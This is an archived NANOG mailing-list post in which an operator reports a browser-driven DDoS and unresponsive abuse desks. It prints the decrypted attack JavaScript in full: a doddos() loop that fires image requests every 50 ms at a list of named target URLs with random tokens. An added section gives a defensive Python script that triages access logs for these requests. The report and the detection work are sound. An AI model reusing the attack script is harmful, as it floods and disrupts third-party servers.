[89510] in North American Network Operators' Group

Ongoing DDoS helped by non responsive abuse desks

daemon@ATHENA.MIT.EDU (Martin Lathoud)
Thu Mar 23 10:55:27 2006

Date: Thu, 23 Mar 2006 10:54:56 -0500
From: "Martin Lathoud" <nytral@gmail.com>
To: nanog@merit.edu
Errors-To: owner-nanog@merit.edu


Hi,

One of our web servers got hammered by ~5K req/s for hours from
browsers with the following referer:
http://www.freewebs.com/ihatespammers/nospam.html
Both freewebs.com and their network provider Cogent have been contacted
without any visible result, even if the script is very effective (no
filtering slows it down but redirecting to an https with an invalid
cert eventually messes the attackers' browser).
Given that the source is still up (and has been updated since
yesterday), I wonder what one can expect by contacting each concerned
domain host.
The decrypted jscript is:

var target=new Array();
target[0]="http://weerona.com/ph/order.php?%rand%"
target[1]="http://fabutons.info/aw/001/?%rand%"
target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
target[3]="http://www.fakeidonline.com/store.php?%rand%"
target[4]="http://ccebak.bestti.info/p/?%rand%"
target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"

//target[5]="http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%"
//target[6]="http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%"
//target[7]="http://fqnbywsqfghz.logomarz.com/counter.php?%rand%"
//target[8]="http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%"
//target[9]="http://www.logodentity.com/ordernow.php?%rand%"
//target[10]="http://www.clearlogo.com/ordernow.php?plan=1&%rand%=%rand%"
//target[11]="http://www.heartysouvenirs.info/?page=shoppingcart&%rand%=%rand%"
//target[9]="http://www.webpromotionnow.com/?%rand%"


// Do not edit below this line

var arrcount = 0;
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
function doddos(){
    var randomstring = '';
    for (var i=0; i<8; i++) {
        var rnum = Math.floor(Math.random() * chars.length);
        randomstring += chars.substring(rnum,rnum+1);
    }

    if (arrcount > (target.length - 1)){
        arrcount = 0;
    }

    var dimg = new Image;
    dimg.src=target[arrcount].replace(/\%rand\%/g,randomstring);
    arrcount++;

    setTimeout("doddos()",50);
}

setTimeout("doddos()",50);
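
Added example, not part of the original post: a log triage sketch that counts requests with the shape this script produces (the referer named in the message plus the 8-character alphanumeric token that doddos() substitutes for %rand%), per second and per client. The combined log format, the /index.php path, the sample lines and the documentation-range addresses are constructed assumptions.

```python
import re
from collections import Counter

# Referer named in the post; browsers running the script send it.
ATTACK_REFERER = "http://www.freewebs.com/ihatespammers/nospam.html"
# doddos() replaces %rand% with exactly 8 characters from [0-9A-Za-z].
RAND_TOKEN = re.compile(r"(?:^|[&=])[0-9A-Za-z]{8}(?=$|[&=])")
# Assumption: Apache/nginx "combined" access log format.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def is_script_request(method, url, referer):
    """True when a request has the shape the posted script generates."""
    # Image loads (dimg.src = ...) are plain GETs carrying the page's referer.
    if method != "GET" or referer != ATTACK_REFERER:
        return False
    query = url.partition("?")[2]
    return bool(RAND_TOKEN.search(query))

def summarize(lines):
    """Count matching requests per log second and per client address."""
    per_second, per_ip = Counter(), Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_script_request(m["method"], m["url"], m["referer"]):
            per_second[m["ts"]] += 1
            per_ip[m["ip"]] += 1
    return per_second, per_ip

# Constructed sample lines (documentation-range IPs, hypothetical path).
_FMT = ('{ip} - - [23/Mar/2006:10:00:{s} -0500] "GET {url} HTTP/1.1" '
        '200 512 "{ref}" "Mozilla/4.0"')
SAMPLE = [
    _FMT.format(ip="192.0.2.10", s="01", url="/index.php?aB3dE9xZ", ref=ATTACK_REFERER),
    _FMT.format(ip="192.0.2.10", s="01", url="/index.php?Qw7Lm2Pz", ref=ATTACK_REFERER),
    _FMT.format(ip="198.51.100.7", s="02",
                url="/index.php?id=1808&Zk4Tn8Vc=Zk4Tn8Vc", ref=ATTACK_REFERER),
    _FMT.format(ip="203.0.113.5", s="02", url="/index.php?page=2", ref="-"),
    _FMT.format(ip="203.0.113.5", s="02", url="/index.php?id=1808", ref=ATTACK_REFERER),
]

if __name__ == "__main__":
    per_second, per_ip = summarize(SAMPLE)
    for key, n in per_second.most_common() + per_ip.most_common():
        print(key, n)
```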
